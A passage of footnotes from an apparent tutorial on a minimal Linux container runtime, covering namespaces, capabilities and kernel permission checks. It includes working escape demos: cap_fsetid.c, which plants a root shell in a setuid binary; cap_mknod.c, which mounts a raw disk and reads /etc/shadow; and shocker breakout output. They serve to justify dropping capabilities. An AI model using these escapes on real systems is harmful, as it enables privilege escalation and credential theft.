The stack grows down on x86, so the fact that the address is higher numerically post-execve means that a new stack has been allocated.

⁶

I thought this might be undefined behavior, since stack + STACK_SIZE does point past the last item of the array, but point 8 of 6.5.6 [Additive operators] in ISO-9899 has us covered:

If both the pointer operand and the result point to elements of the same array object, or one past the last element of the array object, the evaluation shall not produce an overflow; otherwise, the behavior is undefined. If the result points one past the last element of the array object, it shall not be used as the operand of a unary * operator that is evaluated.

i.e., the pointer addition is valid, but dereferencing it wouldn't be.
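A tiny sketch of the same computation, with a made-up helper name. One assumption I'm adding: in strict ISO C, arithmetic on a void * isn't defined (GCC accepts it as an extension), so this version casts to char * first.

```c
#include <stddef.h>

/* Top-of-stack pointer for a downward-growing stack: one past the last
 * byte of the allocation. Computing it is fine; dereferencing it is not. */
char *stack_top(void *base, size_t size)
{
	return (char *)base + size;
}
```

So `clone(child, stack_top(stack, STACK_SIZE), ...)` would be the portable spelling of `stack + STACK_SIZE`.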

⁷

I wasn't confident that waitpid was enough to wait for the process and all of its children, but when the root of a pid namespace closes, all of its children get SIGKILL:

man 7 pid_namespaces:

If the "init" process of a PID namespace terminates, the kernel terminates all of the processes in the namespace via a SIGKILL signal. This behavior reflects the fact that the "init" process is essential for the correct operation of a PID namespace.

Also verified this myself, before I found that:

Listing 18: persistent_child.c

/* -*- compile-command: "gcc -Wall -Werror -static persistent_child.c -o persistent_child" -*- */
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char **argv)
{
	switch (fork()) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		int fd = 0;
		if ((fd = open("persistent_child.log",
			       O_CREAT | O_APPEND | O_WRONLY,
			       S_IRUSR | S_IWUSR)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		size_t count = 0;
		while (count < 100) {
			if (dprintf(fd, "%zu\n", count++) < 0) {
				fprintf(stderr, "++ dprintf failed: %m\n");
				close(fd);
				return 1;
			}
			sleep(1);
		}
		close(fd);
		return 0;
	default:
		sleep(2);
		return 0;
	}
}

[lizzie@empress l-c-i-500-l]$ touch persistent_child.log 
[lizzie@empress l-c-i-500-l]$ chmod 666 persistent_child.log 
[lizzie@empress l-c-i-500-l]$ sudo strace -f ./contained -m . -u 0 -c ./persistent_child
execve("./contained", ["./contained", "-m", ".", "-u", "0", "-c", "./persistent_child"], [/* 15 vars */]) = 0
brk(NULL)                               = 0x605490
# ...
[pid   736] clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x6b68d0) = 2
strace: Process 746 attached
[pid   736] nanosleep({2, 0},  <unfinished ...>
[pid   746] open("persistent_child.log", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
[pid   746] fstat(3, {st_mode=S_IFREG|0666, st_size=4, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 0
[pid   746] write(3, "0\n", 2)          = 2
[pid   746] nanosleep({1, 0}, 0x3fee2d718d0) = 0
[pid   746] fstat(3, {st_mode=S_IFREG|0666, st_size=6, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 6
[pid   746] write(3, "1\n", 2)          = 2
[pid   746] nanosleep({1, 0},  <unfinished ...>
[pid   736] <... nanosleep resumed> 0x3fee2d718d0) = 0
[pid   736] exit_group(0)               = ?
[pid   746] +++ killed by SIGKILL +++
[pid   736] +++ exited with 0 +++
# ...

Listing 19: <<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;
	if (handle_child_uid_map(child_pid, sockets[0])) {
		err = 1;
		goto kill_and_finish_child;
	}

	goto finish_child;
kill_and_finish_child:
	if (child_pid) kill(child_pid, SIGKILL);
finish_child:;
	int child_status = 0;
	waitpid(child_pid, &child_status, 0);
	err |= WEXITSTATUS(child_status);
clear_resources:
	free_resources(&config);
	free(stack);

A process setting its own user namespace is pretty limited⁸, so the parent will wait until the child enters the user namespace, and then write a mapping to its uid_map and gid_map.

⁸

Listing 20: man 7 user_namespaces

	In order for  a process to write  to the /proc/[pid]/uid_map
	(/proc/[pid]/gid_map)   file,    all   of    the   following
	requirements must be met:

	1. The writing process must have the CAP_SETUID (CAP_SETGID)
	   capability in the user namespace of the process pid.

	2. The writing process must either  be in the user namespace
	   of the process pid or be  in the parent user namespace of
	   the process pid.

	3. The  mapped user  IDs (group  IDs)  must in  turn have  a
	   mapping in the parent user namespace.

	4. One of the following two cases applies:

	   *  Either   the  writing   process  has   the  CAP_SETUID
		 (CAP_SETGID) capability in the parent user namespace.

		 +  No further restrictions apply: the process can make
		    mappings to  arbitrary user IDs (group  IDs) in the
		    parent user namespace.

	   *  Or otherwise all of the following restrictions apply:

		 +  The data written to  uid_map (gid_map) must consist
		    of a  single line  that maps the  writing process's
		    effective  user ID  (group ID)  in the  parent user
		    namespace  to a  user  ID (group  ID)  in the  user
		    namespace.

		 +  The writing  process must  have the  same effective
		    user  ID  as  the  process that  created  the  user
		    namespace.

		 +  In  the case  of gid_map,  use of  the setgroups(2)
		    system call must first be denied by writing deny to
		    the /proc/[pid]/setgroups  file (see  below) before
		    writing to gid_map.

	Writes  that violate  the above  rules fail  with the  error
	EPERM.
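For reference, each line written to uid_map or gid_map has three fields: the first ID inside the namespace, the first ID outside it, and the length of the range. A minimal sketch of formatting such a line follows; `format_id_map` and the example numbers are hypothetical and only there for illustration.

```c
#include <stdio.h>

/* Format one uid_map/gid_map line: "<id inside> <id outside> <count>\n".
 * Returns 0 on success, -1 if the buffer is too small or formatting fails. */
int format_id_map(char *buf, size_t len,
		  unsigned inside, unsigned outside, unsigned count)
{
	int n = snprintf(buf, len, "%u %u %u\n", inside, outside, count);
	return (n < 0 || (size_t)n >= len) ? -1 : 0;
}
```

For example, `format_id_map(line, sizeof(line), 0, 10000, 2000)` produces "0 10000 2000\n", which maps uids 0 through 1999 inside the namespace to 10000 through 11999 outside it.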

⁹

gid, sgid, and egid are separate from group_info in struct cred:

Listing 22: include/linux/cred.h:95@c8d2bc

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *	task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *	upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

¹⁰

For example, test_perm in the /proc/sys-handling-code:

Listing 25: fs/proc/proc_sysctl.c:406@c8d2bc

static int test_perm(int mode, int op)
{
	if (uid_eq(current_euid(), GLOBAL_ROOT_UID))
		mode >>= 6;
	else if (in_egroup_p(GLOBAL_ROOT_GID))
		mode >>= 3;
	if ((op & ~mode & (MAY_READ|MAY_WRITE|MAY_EXEC)) == 0)
		return 0;
	return -EACCES;
}
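To see what the shifts do, here's a userspace re-statement of the same logic. The two flag parameters stand in for the kernel's uid_eq(current_euid(), GLOBAL_ROOT_UID) and in_egroup_p(GLOBAL_ROOT_GID) checks; `test_perm_sketch` is my name, and the MAY_* values are copied from include/linux/fs.h.

```c
#include <errno.h>

#define MAY_EXEC  0x1
#define MAY_WRITE 0x2
#define MAY_READ  0x4

/* Same bit arithmetic as test_perm(), with the credential checks
 * replaced by plain flags so it can run outside the kernel. */
int test_perm_sketch(int mode, int op, int is_global_root,
		     int in_global_root_group)
{
	if (is_global_root)
		mode >>= 6;	/* use the owner bits */
	else if (in_global_root_group)
		mode >>= 3;	/* use the group bits */
	/* otherwise the low three "other" bits apply */
	if ((op & ~mode & (MAY_READ | MAY_WRITE | MAY_EXEC)) == 0)
		return 0;
	return -EACCES;
}
```

With a 0644 sysctl entry, a write passes only when the first flag is set. A process that is uid 0 only inside a user namespace doesn't compare equal to GLOBAL_ROOT_UID, so it falls through to the "other" bits and gets -EACCES.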

¹¹

Listing 26: try_regain_cap.c

/* -*- compile-command: "gcc -Wall -Werror -static try_regain_cap.c -o try_regain_cap" -*- */
#include <linux/capability.h>
#include <sys/prctl.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	if (prctl(PR_CAPBSET_READ, CAP_MKNOD, 0, 0, 0)) {
 		fprintf(stderr, "++ have CAP_MKNOD\n");
	} else {
		fprintf(stderr, "++ don't have CAP_MKNOD\n");
	}
	return 0;
}

If we drop the bounding set, files with extra capabilities don't get those capabilities:

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+p" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.lVLNB1...done.
=> trying a user namespace...writing /proc/852/uid_map...writing /proc/852/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ don't have CAP_MKNOD
=> cleaning cgroups...done.

but if we don't, they work:

Listing 27: allow_all_caps.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..6ab1719 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -53,10 +53,7 @@ int capabilities()
 	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
 	fprintf(stderr, "bounding...");
 	for (size_t i = 0; i < num_caps; i++) {
-		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
-			fprintf(stderr, "prctl failed: %m\n");
-			return 1;
-		}
+		continue;
 	}
 	fprintf(stderr, "inheritable...");
 	cap_t caps = NULL;

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_all_caps -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Qnzw2A...done.
=> trying a user namespace...writing /proc/940/uid_map...writing /proc/940/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD
=> cleaning cgroups...done.

(and if we set +ep, execve fails because it's considered a "capability-dumb binary")

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+ep" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Esog3p...done.
=> trying a user namespace...writing /proc/994/uid_map...writing /proc/994/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
execve failed! Operation not permitted.
=> cleaning cgroups...done.

Listing 28: man 7 capabilities

   Safety checking for capability-dumb binaries
	A  capability-dumb binary  is an  application that  has been
	marked to have file capabilities, but has not been converted
	to  use the  libcap(3) API  to manipulate  its capabilities.
	(In  other words,  this  is  a traditional  set-user-ID-root
	program that has been switched to use file capabilities, but
	whose   code   has   not   been   modified   to   understand
	capabilities.)    For  such   applications,  the   effective
	capability  bit  is  set  on  the file,  so  that  the  file
	permitted  capabilities  are  automatically enabled  in  the
	process effective  set when executing the  file.  The kernel
	recognizes a file which has the effective capability bit set
	as capability-dumb  for the  purpose of the  check described
	here.

	When executing  a capability-dumb binary, the  kernel checks
	if the process obtained all permitted capabilities that were
	specified in  the file  permitted set, after  the capability
	transformations described  above have been  performed.  (The
	typical  reason  why  this  might  not  occur  is  that  the
	capability bounding set masked  out some of the capabilities
	in the file  permitted set.)  If the process  did not obtain
	the full set of  file permitted capabilities, then execve(2)
	fails with the error EPERM.  This prevents possible security
	risks that could arise when a capability-dumb application is
	executed with less  privilege that it needs.   Note that, by
	definition, the application could  not itself recognize this
	problem, since it does not employ the libcap(3) API.
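
The check quoted above is easier for me to follow as arithmetic on bitmasks. Here's a minimal sketch of the permitted-set rule from capabilities(7) plus the capability-dumb check, ignoring ambient capabilities and the special cases for root. The names exec_caps, model_execve and EXAMPLE_CAP_MKNOD are made up for illustration; this models the rule and is not kernel code.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>

/* Bit position of CAP_MKNOD, mirrored from <linux/capability.h>. */
#define EXAMPLE_CAP_MKNOD 27

/* Hypothetical, simplified view of the state that execve(2) looks at. */
struct exec_caps {
	uint64_t proc_inheritable; /* P(inheritable) */
	uint64_t bounding;         /* cap_bset */
	uint64_t file_permitted;   /* F(permitted) */
	uint64_t file_inheritable; /* F(inheritable) */
	bool file_effective;       /* F(effective), a single bit on the file */
};

/* Stores P'(permitted) and returns 0, or returns -EPERM when a
 * capability-dumb binary would not get all of its file permitted set. */
int model_execve(const struct exec_caps *c, uint64_t *new_permitted)
{
	uint64_t permitted = (c->proc_inheritable & c->file_inheritable)
		| (c->file_permitted & c->bounding);

	/* The effective bit is what marks the file as capability-dumb. */
	if (c->file_effective && (c->file_permitted & ~permitted))
		return -EPERM;

	*new_permitted = permitted;
	return 0;
}
```

With CAP_MKNOD dropped from the bounding set and a file marked cap_mknod+ep, model_execve returns -EPERM, like the failed execve in the transcript above. With cap_mknod+p it succeeds, but the new permitted set is empty.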

¹²

Listing 30: kernel/audit.c:663@c8d2bc

switch (msg_type) {
case AUDIT_LIST:
case AUDIT_ADD:
case AUDIT_DEL:
	return -EOPNOTSUPP;
case AUDIT_GET:
case AUDIT_SET:
case AUDIT_GET_FEATURE:
case AUDIT_SET_FEATURE:
case AUDIT_LIST_RULES:
case AUDIT_ADD_RULE:
case AUDIT_DEL_RULE:
case AUDIT_SIGNAL_INFO:
case AUDIT_TTY_GET:
case AUDIT_TTY_SET:
case AUDIT_TRIM:
case AUDIT_MAKE_EQUIV:
	/* Only support auditd and auditctl in initial pid namespace
	 * for now. */
	if (task_active_pid_ns(current) != &init_pid_ns)
		return -EPERM;

	if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
		err = -EPERM;
	break;
case AUDIT_USER:
case AUDIT_FIRST_USER_MSG ... AUDIT_LAST_USER_MSG:
case AUDIT_FIRST_USER_MSG2 ... AUDIT_LAST_USER_MSG2:
	if (!netlink_capable(skb, CAP_AUDIT_WRITE))
		err = -EPERM;
	break;
default:  /* bad msg */
	err = -EINVAL;
}

¹³

You can obtain an audit system file descriptor by calling

socket(AF_NETLINK, SOCK_DGRAM, NETLINK_AUDIT)

Listing 31: man 7 netlink

NETLINK(7) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	netlink  -  communication  between  kernel  and  user  space
	(AF_NETLINK)
SYNOPSIS
	[...]
	netlink_socket = socket(AF_NETLINK, socket_type, netlink_family);
	[...]
DESCRIPTION
	Netlink is  used to transfer information  between the kernel
	and  user-space  processes.   It   consists  of  a  standard
	sockets-based  interface for  user  space  processes and  an
	internal kernel API for kernel modules.
	[...]
	netlink_family selects the kernel module or netlink group to
	communicate with.   The currently assigned  netlink families
	are:
	[...]
	NETLINK_AUDIT (since Linux 2.6.6)
		Auditing.

¹⁴

Listing 33: man 7 capabilities

	CAP_BLOCK_SUSPEND (since Linux 3.5)
		Employ features that can block system suspend (epoll(7)
		EPOLLWAKEUP, /proc/sys/wake_lock).
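
To make the EPOLLWAKEUP case concrete, here's a small sketch that registers a pipe with epoll and asks for wakeup behavior. The function name epoll_wakeup_demo is made up. As far as I can tell from epoll_ctl(2), a caller without CAP_BLOCK_SUSPEND doesn't get an error; the flag is silently ignored, so the call succeeds either way.

```c
#include <sys/epoll.h>
#include <unistd.h>

/* Register the read end of a pipe with EPOLLWAKEUP set.
 * Returns the result of epoll_ctl (0 on success), or -1 if setup failed. */
int epoll_wakeup_demo(void)
{
	int pipefd[2];
	if (pipe(pipefd) == -1)
		return -1;

	int epfd = epoll_create1(0);
	if (epfd == -1) {
		close(pipefd[0]);
		close(pipefd[1]);
		return -1;
	}

	struct epoll_event ev = { .events = EPOLLIN | EPOLLWAKEUP };
	ev.data.fd = pipefd[0];
	int ret = epoll_ctl(epfd, EPOLL_CTL_ADD, pipefd[0], &ev);

	close(epfd);
	close(pipefd[0]);
	close(pipefd[1]);
	return ret;
}
```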

¹⁵

An email and description by Sebastian Krahmer

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at(). Handles are mostly 64bit values and can be kind of pre-computed as they are inode-based and the inode of / is 2. So you can go ahead and walk / by passing a handle of 2 and search the FS until you find the inode# of the file you want to access. Even though you are containered somewhere in /var/lib.

which links to the code, shocker.c.

Note that if user namespaces are on, we're not vulnerable, since open_by_handle_at checks for CAP_DAC_READ_SEARCH in the root namespace:

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GSmTxw...done.
=> trying a user namespace...writing /proc/1538/uid_map...writing /proc/1538/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.

Listing 35: fs/fhandle.c:166

static int handle_to_path(int mountdirfd, struct file_handle __user *ufh,
		   struct path *path)
{
	int retval = 0;
	struct file_handle f_handle;
	struct file_handle *handle = NULL;

	/*
	 * With handle we don't look at the execute bit on the
	 * the directory. Ideally we would like CAP_DAC_SEARCH.
	 * But we don't have that
	 */
	if (!capable(CAP_DAC_READ_SEARCH)) {
		retval = -EPERM;
		goto out_err;
	}
	/* ... */
}
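
For reference, this is roughly what the handle round trip looks like from userspace. It's a sketch, not what shocker.c does: shocker guesses handles, while this asks the kernel for one with name_to_handle_at and then reopens it. The function name reopen_by_handle is made up. Without CAP_DAC_READ_SEARCH I'd expect the second step to fail with EPERM, per the check in the listing above.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* Translate path to a file handle, then reopen it by handle.
 * Returns 0 on success or a negative errno value. */
int reopen_by_handle(const char *path)
{
	int ret = 0;
	int mount_id = 0;
	int mount_fd = -1;
	int fd = -1;
	struct file_handle *fh = malloc(sizeof(*fh) + MAX_HANDLE_SZ);
	if (!fh)
		return -ENOMEM;
	fh->handle_bytes = MAX_HANDLE_SZ;

	if (name_to_handle_at(AT_FDCWD, path, fh, &mount_id, 0) == -1) {
		ret = -errno;
		goto out;
	}
	/* Any open fd on the same filesystem can serve as the mount reference. */
	mount_fd = open(path, O_RDONLY);
	if (mount_fd == -1) {
		ret = -errno;
		goto out;
	}
	/* This is the call that requires CAP_DAC_READ_SEARCH. */
	fd = open_by_handle_at(mount_fd, fh, O_RDONLY);
	if (fd == -1)
		ret = -errno;
out:
	if (fd != -1)
		close(fd);
	if (mount_fd != -1)
		close(mount_fd);
	free(fh);
	return ret;
}
```

Some filesystems don't support handles at all, in which case the first step fails with EOPNOTSUPP before the capability check is ever reached.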

¹⁶

The setuid executable we'll subvert:

Listing 37: harmless_setuid.c

/* -*- compile-command: "gcc -Wall -Werror harmless_setuid.c -o harmless_setuid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	uid_t a, b, c = 0;
	getresuid(&a, &b, &c);
	printf("I'm #%d/%d/%d\n", a, b, c);
	return 0;
}

This program will write itself to the executable at argv[1]. If it's a setuid root executable, there's no user namespace, and CAP_FSETID isn't dropped, it'll retain setuid root.

Listing 38: cap_fsetid.c

/* -*- compile-command: "gcc -Wall -Werror -static cap_fsetid.c -o cap_fsetid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (argc == 2) {
		/* write our contents to the setuid file. */
		int setuid_file = 0;
		int own_file = 0;
		if ((setuid_file = open(argv[1], O_WRONLY | O_TRUNC)) == -1
		    || (own_file = open(argv[0], O_RDONLY)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		errno = 0;
		char here = 0;
		while (read(own_file, &here, 1) > 0
		       && write(setuid_file, &here, 1) > 0);
		if (errno) {
			fprintf(stderr, "++ reading/writing: %m\n");
			close(setuid_file);
			close(own_file);
			return 1;
		}
		close(own_file);
		close(setuid_file);
	} else {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ failed switching uids to root: %m\n");
			return 1;
		}
		execve("/bin/sh", (char *[]) { "sh", 0 }, NULL);
	}
	return 0;
}

Listing 39: allow_capfsetid.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..17e7373 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -34,7 +34,6 @@ int capabilities()
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
 		CAP_DAC_READ_SEARCH,
-		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,

[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
I'm #1000/0/0
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.qapCVs...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid 
++ failed switching uids to root: Operation not permitted
[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capfsetid -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.4u1dNe...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ./harmless_setuid
-rwsr-xr-x 1 root lizzie 788K Oct 25 05:22 ./harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
sh-4.3# whoami
root
sh-4.3# id
uid=0(root) gid=1000(lizzie) groups=1000(lizzie)
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$ rm harmless_setuid
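
The behavior this relies on is easy to check in isolation: when a process without CAP_FSETID writes to a setuid file, the kernel clears the setuid bit. Here's a sketch that sets the bit on a scratch file, writes one byte, and looks at the mode again. The function name and the /tmp path are assumptions for illustration.

```c
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if the set-user-ID bit survived a write, 0 if the kernel
 * cleared it, and -1 on error. */
int setuid_survives_write(void)
{
	char path[] = "/tmp/fsetid-demo-XXXXXX";
	int fd = mkstemp(path);
	if (fd == -1)
		return -1;

	int result = -1;
	struct stat st;
	if (fchmod(fd, 04755) == 0
	    && write(fd, "x", 1) == 1
	    && fstat(fd, &st) == 0)
		result = (st.st_mode & S_ISUID) ? 1 : 0;

	close(fd);
	unlink(path);
	return result;
}
```

I'd expect 0 for an ordinary user and 1 for a process that still holds CAP_FSETID, which is the difference between the two runs above.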

¹⁷

Listing 41: man 2 mlock

DESCRIPTION
	mlock(), mlock2(),  and mlockall() lock  part or all  of the
	calling process's virtual address space into RAM, preventing
	that memory from being paged to the swap area.

	munlock() and  munlockall() perform the  converse operation,
	unlocking  part  or all  of  the  calling process's  virtual
	address  space,  so  that  pages in  the  specified  virtual
	address range may once more to be swapped out if required by
	the kernel memory manager.

	Memory locking and unlocking are performed in units of whole
	pages.

ERRORS

	ENOMEM
		(Linux  2.6.9  and  later)  the caller  had  a  nonzero
		RLIMIT_MEMLOCK soft  resource limit, but tried  to lock
		more memory  than the  limit permitted.  This  limit is
		not   enforced    if   the   process    is   privileged
		(CAP_IPC_LOCK).

These functions are the only use of CAP_IPC_LOCK; the only mention in the source is

Listing 42: mm/mlock.c:27@c8d2bc

bool can_do_mlock(void)
{
	if (rlimit(RLIMIT_MEMLOCK) != 0)
		return true;
	if (capable(CAP_IPC_LOCK))
		return true;
	return false;
}

¹⁸

Listing 45: cap_mknod.c

/* -*- compile-command: "gcc -Wall -Werror -static cap_mknod.c -o cap_mknod" -*- */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#define DEV "/disk"
#define MNT "/mnt"

int main (int argc, char **argv)
{
	if (argc != 4) return 1;
	int return_code = 0;
	int etc_shadow = 0;
	
	dev_t dev = makedev(atoi(argv[1]), atoi(argv[2]));
	if (mknod(DEV, S_IFBLK | S_IRUSR, dev)) {
		fprintf(stderr, "++ mknod failed: %m\n");
		return 1;
	}
	if (mkdir(MNT, S_IRUSR)
	    && (errno != EEXIST)) {
		fprintf(stderr, "++ mkdir failed: %m\n");
		goto cleanup_error;
	}
	if (mount(DEV, MNT, argv[3], 0, NULL)) {
		fprintf(stderr, "++ mount failed: %m\n");
		goto cleanup_error;
	}
	if ((etc_shadow = open(MNT "/etc/shadow", O_RDONLY)) == -1) {
		fprintf(stderr, "++ opening /etc/shadow failed: %m\n");
		goto cleanup_error;
	}
	fprintf(stderr, "++ reading /etc/shadow:\n");
	char here = 0;
	errno = 0;
	while (read(etc_shadow, &here, 1) > 0)
		write(STDOUT_FILENO, &here, 1);
	if (errno) {
		fprintf(stderr, "read loop failed! %m\n");
		goto cleanup_error;
	}
	goto cleanup;
cleanup_error:
	return_code = 1;
cleanup:
	if (etc_shadow > 0) close(etc_shadow);
	umount(MNT);
	unlink(DEV);
	rmdir(MNT);
	return return_code;
}

Listing 46: allow_capmknod.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..985930e 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,10 +38,8 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
